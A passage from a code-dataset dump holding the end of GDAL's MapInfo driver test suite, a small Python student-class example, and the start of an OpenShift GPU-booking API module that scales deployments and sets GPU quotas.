UNIT[\"metre\",1]]\"\"\"\n )\n\n assert sr_got.IsSame(sr_expected) != 0, sr_got.ExportToPrettyWkt()\n\n\n###############################################################################\n# Test reading an aspatial TAB file.\n\n\ndef test_ogr_mitab_49_aspatial():\n\n ds = ogr.GetDriverByName(\"MapInfo File\").Open(\"data/mitab/aspatial.tab\")\n lyr = ds.GetLayer(0)\n\n geom_type = lyr.GetLayerDefn().GetGeomType()\n assert geom_type == ogr.wkbNone\n\n assert lyr.GetSpatialRef() is None\n\n assert lyr.GetExtent(can_return_null=True) is None\n\n\n###############################################################################\n# Test creating an indexed field\n\n\ndef test_ogr_mitab_tab_field_index_creation(tmp_vsimem):\n\n layername = \"ogr_mitab_tab_field_index_creation\"\n filename = tmp_vsimem / f\"{layername}.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(layername)\n lyr.CreateField(ogr.FieldDefn(\"id\", ogr.OFTInteger))\n lyr.CreateField(ogr.FieldDefn(\"other_field\", ogr.OFTInteger))\n with gdal.quiet_errors():\n ds.ExecuteSQL(\"CREATE INDEX ON foo USING id\")\n ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING foo\")\n ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING id\")\n ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING id\")\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(0, 100)\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(0, 200)\n lyr.CreateFeature(f)\n ds = None\n\n assert gdal.VSIStatL(tmp_vsimem / f\"{layername}.ind\") is not None, \"no ind file\"\n\n ds = ogr.Open(filename)\n with gdal.quiet_errors():\n ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING other_field\")\n lyr = ds.GetLayer(0)\n lyr.SetAttributeFilter(\"id = 200\")\n assert lyr.GetFeatureCount() == 1, \"bad feature count\"\n ds = None\n\n\n###############################################################################\n# Test reading a tab_view file\n\n\ndef test_ogr_mitab_tab_view():\n\n ds = ogr.Open(\"data/mitab/view_first_table_second_table.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetLayerDefn().GetFieldCount() == 2, \"bad field count\"\n f = lyr.GetNextFeature()\n if f[\"ID\"] != 100 or f[\"foo\"] != \"foo\":\n f.DumpReadable()\n pytest.fail(\"bad feature\")\n ds = None\n\n ds = ogr.Open(\"data/mitab/view_select_all_first_table_second_table.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetLayerDefn().GetFieldCount() == 3, \"bad field count\"\n f = lyr.GetNextFeature()\n if f[\"joint_field\"] != 1 or f[\"ID\"] != 100 or f[\"foo\"] != \"foo\":\n f.DumpReadable()\n pytest.fail(\"bad feature\")\n ds = None\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_style(tmp_vsimem):\n\n tmpfile = tmp_vsimem / \"ogr_mitab_style.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmpfile)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"id\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POLYGON((0 0,0 1,1 1,0 0))\"))\n f.SetStyleString(\"BRUSH(fc:#AABBCC,bc:#DDEEFF);PEN(c:#DDEEFF)\")\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POLYGON((0 0,0 1,1 1,0 0))\"))\n f.SetStyleString('BRUSH(fc:#AABBCC,id:\"mapinfo-brush-1\")')\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POLYGON((0 0,0 1,1 1,0 0))\"))\n f.SetStyleString(\"BRUSH(fc:#AABBCC00,bc:#ddeeff00)\")\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(tmpfile)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if (\n f.GetStyleString()\n != 'BRUSH(fc:#aabbcc,bc:#ddeeff,id:\"mapinfo-brush-2,ogr-brush-0\");PEN(w:1px,c:#ddeeff,id:\"mapinfo-pen-2,ogr-pen-0\",cap:r,j:r)'\n ):\n f.DumpReadable()\n pytest.fail()\n f = lyr.GetNextFeature()\n if (\n f.GetStyleString()\n != 'BRUSH(fc:#aabbcc,id:\"mapinfo-brush-1,ogr-brush-1\");PEN(w:1px,c:#000000,id:\"mapinfo-pen-2,ogr-pen-0\",cap:r,j:r)'\n ):\n f.DumpReadable()\n pytest.fail()\n f = lyr.GetNextFeature()\n if (\n f.GetStyleString()\n != 'BRUSH(fc:#aabbcc,id:\"mapinfo-brush-1,ogr-brush-1\");PEN(w:1px,c:#000000,id:\"mapinfo-pen-2,ogr-pen-0\",cap:r,j:r)'\n ):\n f.DumpReadable()\n pytest.fail()\n ds = None\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_tab_write_field_name_with_dot(tmp_vsimem):\n\n tmpfile = tmp_vsimem / \"ogr_mitab_tab_write_field_name_with_dot.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmpfile)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"with.dot\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"with.dot\"] = 1\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(2 3)\"))\n lyr.CreateFeature(f)\n with gdal.quiet_errors():\n ds = None\n\n ds = ogr.Open(tmpfile)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"with_dot\"] == 1\n ds = None\n\n\n###############################################################################\n# Test read text labels with local encoding from mif/mid file\n\n\n@pytest.mark.parametrize(\n \"fname,expectedStyle\",\n (\n (\n \"win1251_text.mif\",\n 'LABEL(t:\"Поле\",a:0.000000,s:2.070000g,c:#ff0000,p:2,f:\"DejaVu Serif\")',\n ),\n (\n \"tab-win1251_text.tab\",\n 'LABEL(t:\"Поле\",a:0.000000,s:0.015375g,c:#000000,p:1,f:\"Times New Roman\")',\n ),\n ),\n ids=lambda x: x[0],\n)\ndef test_ogr_mitab_local_encoding_label(fname, expectedStyle):\n\n dsName = os.path.join(\"data/mitab\", fname)\n\n ds = ogr.Open(dsName)\n assert ds is not None, \"Can't open dataset: \" + dsName\n\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + dsName\n\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n feat = lyr.GetNextFeature()\n assert lyr is not None, \"Can't find text feature in\" + dsName\n\n assert feat.GetStyleString() == expectedStyle, (\n feat.GetStyleString(),\n expectedStyle,\n )\n\n\n###############################################################################\n# Check fix for https://github.com/OSGeo/gdal/issues/1232\n\n\ndef test_ogr_mitab_delete_feature_no_geometry(tmp_vsimem):\n\n filename = tmp_vsimem / \"test.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", geom_type=ogr.wkbNone)\n lyr.CreateField(ogr.FieldDefn(\"id\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"id\"] = 1\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"id\"] = 2\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n assert lyr.DeleteFeature(1) == 0\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"id\"] == 2\n ds = None\n\n\n###############################################################################\n# Check fix for https://github.com/OSGeo/gdal/issues/1636\n\n\ndef test_ogr_mitab_too_large_value_for_decimal_field(tmp_vsimem):\n\n filename = tmp_vsimem / \"test.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", geom_type=ogr.wkbNone)\n fld = ogr.FieldDefn(\"f\", ogr.OFTReal)\n fld.SetWidth(20)\n fld.SetPrecision(12)\n lyr.CreateField(fld)\n\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"f\"] = 1234567.012\n assert lyr.CreateFeature(f) == ogr.OGRERR_NONE\n f = None\n\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"f\"] = 123456789.012\n with gdal.quiet_errors():\n assert lyr.CreateFeature(f) != ogr.OGRERR_NONE\n f = None\n\n ds = None\n\n\n###############################################################################\n# Check custom datum/spheroid parameters export\n\n\ndef test_ogr_mitab_custom_datum_export():\n\n sr = osr.SpatialReference()\n sr.SetGeogCS(\"Custom\", \"Custom\", \"Sphere\", 6370997.0, 0.0)\n sr.SetTOWGS84(1, 2, 3, 4, 5, 6, 7)\n proj = sr.ExportToMICoordSys()\n assert proj == \"Earth Projection 1, 9999, 12, 1, 2, 3, -4, -5, -6, 7, 0\"\n\n sr = osr.SpatialReference()\n sr.ImportFromMICoordSys(proj)\n assert sr.GetTOWGS84() == (\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n 7,\n ), \"Wrong ExportToMICoordSys / ImportFromMICoordSys pair\"\n\n sr = osr.SpatialReference()\n sr.SetGeogCS(\"Custom\", \"Custom\", \"NWL-9D or WGS-66\", 6378145.0, 298.25)\n sr.SetTOWGS84(1, 2, 3, 4, 5, 6, 7)\n sr.SetUTM(33)\n proj = sr.ExportToMICoordSys()\n assert (\n proj\n == 'Earth Projection 8, 9999, 42, 1, 2, 3, -4, -5, -6, 7, 0, \"m\", 15, 0, 0.9996, 500000, 0'\n )\n\n\n###############################################################################\n# Check write/read description\n\n\ndef test_ogr_mitab_description(tmp_vsimem):\n filename = tmp_vsimem / \"test_description.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n assert ds is not None, \"Can't create dataset: \" + filename\n\n test_description = 'Состав данных: Топокарты (растр) 1:50К, 100К, 250К, 500К, Топокарты (вектор) 1:100К, 1:250К, ЦМР 10м, Реестр географических названий 1:100000, АТД 1:10000, лидарная съемка, ортофото. Лицензия: на геоданные - ограничительная, не соответствующая определению \"открытых данных\", так как запрещено распространение данных.'\n\n lyr = ds.CreateLayer(\n \"test_description\",\n options=[\"ENCODING=CP1251\", \"DESCRIPTION={}\".format(test_description)],\n )\n assert lyr is not None, 'Can\\'t create layer \"test_description\"'\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n lyr.CreateField(ogr.FieldDefn(\"feature_id\", ogr.OFTInteger))\n lyr.CreateField(ogr.FieldDefn(\"other_field\", ogr.OFTInteger))\n\n # Check description truncate.\n check_text = 'Состав данных: Топокарты (растр) 1:50К, 100К, 250К, 500К, Топокарты (вектор) 1:100К, 1:250К, ЦМР 10м, Реестр географических названий 1:100000, АТД 1:10000, лидарная съемка, ортофото. Лицензия: на геоданные - ограничительная, не соответствующая определению \"открытых данных\", так как запрещено распростр'\n assert check_text == lyr.GetMetadataItem(\"DESCRIPTION\")\n ds = None\n\n # Check storing description in tab file.\n ds = ogr.Open(filename, update=1)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n assert check_text == lyr.GetMetadataItem(\"DESCRIPTION\")\n\n # Check update description in tab file.\n check_short_text = \"Состав данных: Топокарты (растр) 1:50К, 100К, 250К, 500К\"\n lyr.SetMetadataItem(\"DESCRIPTION\", check_short_text)\n ds = None\n\n ds = ogr.Open(filename)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n assert check_short_text == lyr.GetMetadataItem(\"DESCRIPTION\")\n ds = None\n\n # Check line breaks and double quotes\n test_description = (\n 'Состав данных: \"Топокарты (растр)\"\\n1:50К,\\n100К,\\n250К,\\n500К\\r\\n\"new line\"'\n )\n check_description = (\n 'Состав данных: \"Топокарты (растр)\" 1:50К, 100К, 250К, 500К \"new line\"'\n )\n\n ds = ogr.Open(filename, update=1)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n lyr.SetMetadataItem(\"DESCRIPTION\", test_description)\n ds = None\n\n ds = ogr.Open(filename)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n assert check_description == lyr.GetMetadataItem(\"DESCRIPTION\")\n ds = None\n\n\n###############################################################################\n# Test writing and reading back unset/null date, time, datetime\n\n\ndef test_ogr_mitab_nulldatetime(tmp_vsimem):\n\n filename = tmp_vsimem / \"nulldatetime.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"nulldatetime\")\n lyr.CreateField(ogr.FieldDefn(\"time\", ogr.OFTTime))\n lyr.CreateField(ogr.FieldDefn(\"date\", ogr.OFTDate))\n lyr.CreateField(ogr.FieldDefn(\"datetime\", ogr.OFTDateTime))\n f = ogr.Feature(lyr.GetLayerDefn())\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert not f.IsFieldSet(\"time\")\n assert not f.IsFieldSet(\"date\")\n assert not f.IsFieldSet(\"datetime\")\n ds = None\n\n\n###############################################################################\n# Test reading .mid files where a field has a newline character\n\n\ndef test_ogr_mitab_read_multi_line_mid():\n\n ds = ogr.Open(\"data/mitab/multilinemid.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"Name\"] == \"NAME1\"\n assert f[\"Notes\"] == \"MULTI\\n\\nLINE\"\n assert f[\"Awesome\"] == \"F\"\n f = lyr.GetNextFeature()\n assert f[\"Name\"] == \"NAME2\"\n assert f[\"Notes\"] == \"MULTI\\nLINE2\"\n assert f[\"Awesome\"] == \"F\"\n\n\n###############################################################################\n# Test reading a .mid file with a single field, and an empty line for a record\n\n\ndef test_ogr_mitab_read_single_field_mid():\n\n ds = ogr.Open(\"data/mitab/single_field.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"foo\"] == \"1\"\n f = lyr.GetNextFeature()\n assert f[\"foo\"] == \"\"\n f = lyr.GetNextFeature()\n assert f[\"foo\"] == \"3\"\n\n\n###############################################################################\n# Test reading a .mif/.tab with all data types\n\n\n@pytest.mark.parametrize(\"ext\", [\"mif\", \"tab\"])\ndef test_ogr_mitab_read_write_all_data_types(tmp_vsimem, ext):\n\n ds = ogr.Open(\"data/mitab/all_possible_fields.\" + ext)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"field1\"] == \"test\"\n assert f[\"Field2\"] == 120\n assert f[\"Field3\"] == 12345\n assert (\n lyr.GetLayerDefn()\n .GetFieldDefn(lyr.GetLayerDefn().GetFieldIndex(\"Field4\"))\n .GetType()\n == ogr.OFTInteger64\n )\n assert f[\"Field4\"] == 123456789012345\n assert f[\"Field5\"] == 12.34\n assert f[\"Field6\"] == 12.34\n assert f[\"Field7\"] == \"2022/12/31\"\n assert f[\"Field8\"] == \"23:59:00\"\n assert f[\"Field9\"] == \"2022/03/23 14:56:00\"\n assert f[\"Field10\"] == \"T\"\n\n filename = tmp_vsimem / f\"test_ogr_mitab_read_write_all_data_types.{ext}\"\n out_ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n out_lyr = out_ds.CreateLayer(\"test\", geom_type=ogr.wkbNone)\n for i in range(lyr.GetLayerDefn().GetFieldCount()):\n out_lyr.CreateField(lyr.GetLayerDefn().GetFieldDefn(i))\n out_f = ogr.Feature(out_lyr.GetLayerDefn())\n out_f.SetFrom(f)\n assert out_lyr.CreateFeature(out_f) == ogr.OGRERR_NONE\n out_f = None\n out_ds = None\n\n\n###############################################################################\n\n\ndef _test_srs(workdir, srs, input_srs=None, ext=\"tab\"):\n \"\"\"srs = srs used for writing (unless input_srs is defined) and comparing\n output\"\"\"\n\n filename = workdir / f\"test_srs.{ext}\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n assert srs\n if isinstance(srs, str):\n tmp = osr.SpatialReference()\n tmp.SetFromUserInput(srs)\n srs = tmp\n if input_srs and isinstance(input_srs, str):\n tmp = osr.SpatialReference()\n tmp.SetFromUserInput(input_srs)\n input_srs = tmp\n lyr = ds.CreateLayer(\n \"test\", srs=(input_srs if input_srs else srs), geom_type=ogr.wkbPoint\n )\n lyr.CreateField(ogr.FieldDefn(\"foo\"))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(ogr.CreateGeometryFromWkt(\"POINT(0 0)\"))\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n got_srs = lyr.GetSpatialRef()\n assert got_srs.IsSame(srs), got_srs.ExportToWkt()\n ds = None\n\n ogr.GetDriverByName(\"MapInfo File\").DeleteDataSource(filename)\n\n\n###############################################################################\n\n\n@pytest.mark.parametrize(\"ext\", [\"tab\", \"mif\"])\ndef test_ogr_mitab_write_etrs89_from_crs_epsg_code(tmp_vsimem, ext):\n\n _test_srs(tmp_vsimem, \"EPSG:25832\", ext=ext)\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_crs_wkt1(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(25832)\n srs.ImportFromWkt(srs.ExportToWkt([\"FORMAT=WKT1\"]))\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_crs_wkt2(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(25832)\n srs.ImportFromWkt(srs.ExportToWkt([\"FORMAT=WKT2\"]))\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_custom_wkt_geogcs_code(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromWkt(\n \"\"\"PROJCS[\"ETRS89 / UTM zone 32N\",\n GEOGCS[\"ETRS89\",\n DATUM[\"European_Terrestrial_Reference_System_1989\",\n SPHEROID[\"GRS 1980\",6378137,298.257222101,\n AUTHORITY[\"EPSG\",\"7019\"]]],\n PRIMEM[\"Greenwich\",0,\n AUTHORITY[\"EPSG\",\"8901\"]],\n UNIT[\"degree\",0.0174532925199433,\n AUTHORITY[\"EPSG\",\"9122\"]],\n AUTHORITY[\"EPSG\",\"4258\"]],\n PROJECTION[\"Transverse_Mercator\"],\n PARAMETER[\"latitude_of_origin\",0],\n PARAMETER[\"central_meridian\",9],\n PARAMETER[\"scale_factor\",0.9996],\n PARAMETER[\"false_easting\",500000],\n PARAMETER[\"false_northing\",0],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n AXIS[\"Easting\",EAST],\n AXIS[\"Northing\",NORTH]]\"\"\"\n )\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_custom_wkt_no_geogcs_code(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromWkt(\n \"\"\"PROJCS[\"ETRS89 / UTM zone 32N\",\n GEOGCS[\"ETRS89\",\n DATUM[\"European_Terrestrial_Reference_System_1989\",\n SPHEROID[\"GRS 1980\",6378137,298.257222101,\n AUTHORITY[\"EPSG\",\"7019\"]],\n AUTHORITY[\"EPSG\",\"6258\"]],\n PRIMEM[\"Greenwich\",0,\n AUTHORITY[\"EPSG\",\"8901\"]],\n UNIT[\"degree\",0.0174532925199433,\n AUTHORITY[\"EPSG\",\"9122\"]]],\n PROJECTION[\"Transverse_Mercator\"],\n PARAMETER[\"latitude_of_origin\",0],\n PARAMETER[\"central_meridian\",9],\n PARAMETER[\"scale_factor\",0.9996],\n PARAMETER[\"false_easting\",500000],\n PARAMETER[\"false_northing\",0],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n AXIS[\"Easting\",EAST],\n AXIS[\"Northing\",NORTH]]\"\"\"\n )\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n# Test writing point with LABEL style string\n\n\ndef test_ogr_mitab_point_label(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"test_ogr_mitab_point_label.tab\"\n )\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1 2)\"))\n f.SetStyleString(\n 'LABEL(t:\"my text\",a:2,s:1.5g,c:#123456,b:#234567,o:#234567,bo:1,it:1,un:1,p:2,f:\"My Font\")'\n )\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"test_ogr_mitab_point_label.tab\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert (\n f.GetStyleString()\n == 'LABEL(t:\"my text\",a:2.000000,s:1.490400g,c:#123456,b:#234567,o:#234567,bo:1,it:1,un:1,p:2,f:\"My Font\")'\n )\n assert f.GetGeometryRef().GetX(0) == pytest.approx(1, 1e-2)\n assert f.GetGeometryRef().GetY(0) == pytest.approx(2, 1e-2)\n ds = None\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_epsg_3125_philippine_reference_system_1992(tmp_vsimem):\n\n _test_srs(tmp_vsimem, \"EPSG:3125\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_read_read_extended_transverse_mercator():\n\n ds = ogr.Open(\"data/mitab/proj_34.mif\")\n lyr = ds.GetLayer(0)\n ref_srs = lyr.GetSpatialRef()\n assert ref_srs.ExportToProj4() == \"+proj=utm +zone=1 +datum=WGS84 +units=m +no_defs\"\n ds = None\n\n\n###############################################################################\n\n\n@pytest.mark.parametrize(\"ext\", [\"mif\", \"tab\"])\ndef test_ogr_mitab_read_write_hotine_oblique_mercator_with_rectified_grid_angle(\n tmp_vsimem, ext\n):\n\n ds = ogr.Open(\"data/mitab/proj_35.mif\")\n lyr = ds.GetLayer(0)\n ref_srs = lyr.GetSpatialRef()\n assert (\n ref_srs.ExportToProj4()\n == \"+proj=omerc +no_uoff +lat_0=4 +lonc=102.25 +alpha=323.025796466667 +gamma=323.130102361111 +k=0.99984 +x_0=804671 +y_0=123456 +ellps=evrst69 +units=m +no_defs\"\n )\n ds = None\n\n filename = (\n tmp_vsimem\n / f\"test_ogr_mitab_read_write_hotine_oblique_mercator_with_rectified_grid_angle.{ext}\"\n )\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", srs=ref_srs, geom_type=ogr.wkbPoint)\n lyr.CreateField(ogr.FieldDefn(\"foo\"))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(ogr.CreateGeometryFromWkt(\"POINT(0 0)\"))\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n got_srs = lyr.GetSpatialRef()\n assert got_srs.ExportToProj4() == ref_srs.ExportToProj4()\n ds = None\n\n\n###############################################################################\n# Test LABEL without text\n\n\ndef test_ogr_mitab_label_without_text(tmp_vsimem):\n\n filename = tmp_vsimem / \"test_ogr_mitab_label_without_text.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"label\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1 2)\"))\n f.SetStyleString(\"LABEL(f:DejaVu Sans,s:0.705557,c:#FF0000FF,b:#000000FF)\")\n lyr.CreateFeature(f)\n ds = None\n\n\n###############################################################################\n# Test fix for https://github.com/OSGeo/gdal/issues/7715\n\n\n@pytest.mark.parametrize(\"ext\", [\"tab\", \"mif\"])\ndef test_ogr_mitab_write_LCC_2SP_non_metre_unit(tmp_vsimem, ext):\n\n _test_srs(tmp_vsimem, \"EPSG:2277\", ext=ext) # \"NAD83 / Texas Central (ftUS)\"\n","repo_name":"OSGeo/gdal","sub_path":"autotest/ogr/ogr_mitab.py","file_name":"ogr_mitab.py","file_ext":"py","file_size_in_byte":95633,"program_lang":"python","lang":"en","doc_type":"code","stars":4154,"dataset":"github-code","pt":"19"} +{"seq_id":"1403973318","text":"from unicodedata import name\r\n\r\n\r\nclass student:\r\n def __init__(self,name,age):\r\n self.name=name\r\n self.age=age\r\n\r\n def PrintDetails(self):\r\n print(\"Name :\", self.name,\"Age:\",self.age)\r\n @staticmethod\r\n def welcome():\r\n print(\"Welcome to our Institutions\")\r\n\r\nT1= student(\"Chan\",24)\r\nT1.PrintDetails()\r\nT1.welcome()\r\n\r\nT2= student(\"selvi\", 37)\r\nT2.PrintDetails()\r\nT2.welcome()","repo_name":"zBalachandar/My-Basic-s-in-python_2022py","sub_path":"@static method in class.py","file_name":"@static method in class.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"1840412199","text":"import csv\nimport datetime\nimport os\nimport pathlib\n\nfrom api.config import settings\nfrom api.gpus import GpuBooking\nfrom api.notifications import post_msg_to_slack, send_email\nfrom api.users import User\nfrom api.utils import log, oc_login\nfrom fastapi.encoders import jsonable_encoder\nfrom sqlmodel import Session, SQLModel, create_engine, select\n\n\n\ndef disable_gpu(project_id, app_id, dyn_client) -> str:\n logs = ''\n\n try:\n # Turn down the DeploymentConfig to 0 replicas\n dyn_dc = dyn_client.resources.get(api_version=settings.CLUSTER_API_VERSION, kind='DeploymentConfig')\n body = {\n 'kind': 'DeploymentConfig',\n 'apiVersion': settings.CLUSTER_API_VERSION,\n 'metadata': {'name': app_id},\n 'spec': {\n 'replicas': 0,\n }\n }\n dyn_dc.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU pod *{app_id}* in *{project_id}* stopped\\n'\n\n except Exception as err:\n logs = logs + f'⚠️ Error stopping the workspace *{app_id}* in *{project_id}*: {str(err)[:21]}\\n'\n\n try:\n # Patch DeploymentConfig GPU limits\n dyn_dc = dyn_client.resources.get(api_version=settings.CLUSTER_API_VERSION, kind='DeploymentConfig')\n body = {\n 'kind': 'DeploymentConfig',\n 'apiVersion': settings.CLUSTER_API_VERSION,\n 'metadata': {'name': app_id},\n 'spec': {\n 'template': {\n 'spec': {\n 'containers': [\n {\n \"name\": app_id,\n \"resources\": {}\n }\n ]\n }\n }\n }\n }\n dyn_dc.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU limits disabled for the pod *{app_id}* in *{project_id}\\n'\n\n except Exception as err:\n logs = logs + f'⚠️ Error disabling GPU limits for the pod *{app_id}* in *{project_id}*: {str(err)[:21]}\\n'\n\n # Patch ResourceQuota for GPU\n try:\n dyn_quota = dyn_client.resources.get(api_version='v1', kind='ResourceQuota')\n body = {\n 'kind': 'ResourceQuota',\n 'apiVersion': 'v1',\n 'metadata': {'name': 'gpu-quota'},\n \"spec\": {\n \"hard\": { \"requests.nvidia.com/gpu\": 0 }\n }\n }\n dyn_quota.patch(body=body, namespace=project_id)\n logs = logs + f'🧊 GPU quota of {project_id} set to 0'\n log.info(logs)\n\n except Exception as err:\n logs = logs + f'❌ Could not set the GPU quota to 0 in *{project_id}*. Error: {str(err)[:21]}'\n\n return logs\n\n # with oc.project(project_id), oc.timeout(10*60):\n # log.info(f\"✅ Found the project {oc.get_project_name()}, disabling GPU\")\n\n # Stop the GPU pod, and change GPU quota to 0\n # cmds = [\n # \"\"\"oc patch dc/\"\"\" + app_id + \"\"\" --type=json -p='[{\"op\": \"replace\", \"path\": \"/spec/replicas\", \"value\": 0}]' -n \"\"\" + project_id,\n # \"\"\"oc patch dc/\"\"\" + app_id + \"\"\" --type=json -p='[{\"op\": \"replace\", \"path\": \"/spec/template/spec/containers/0/resources\", \"value\": {}}]' -n \"\"\" + project_id,\n # \"\"\"oc patch resourcequota/gpu-quota --patch '{\"spec\":{\"hard\": {\"requests.nvidia.com/gpu\": 0}}}' -n \"\"\" + project_id\n # ]\n # for cmd in cmds:\n # # os.system(cmd)\n # # log.info(subprocess.run(cmd.split(' '), capture_output=True))\n # log.info(subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT))\n\n # return f\"🛬✅ Successfully disabled GPU for {app_id} in {project_id}\"\n # except Exception as err:\n # return f\"🛬⚠️ Could not disable the GPU for {app_id} in {project_id}: {str(err)[:21]}\"\n\n\n\ndef enable_gpu(project_id, app_id, dyn_client):\n logs = ''\n email = ''\n try:\n dyn_quota = dyn_client.resources.get(api_version='v1', kind='ResourceQuota')\n body = {\n 'kind': 'ResourceQuota',\n 'apiVersion': 'v1',\n 'metadata': {'name': 'gpu-quota'},\n \"spec\": {\n \"hard\": { \"requests.nvidia.com/gpu\": 1 }\n }\n }\n dyn_quota.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU quota of *{project_id}* set to *1*\\n'\n email = email + f'The GPU was successfully enabled in your 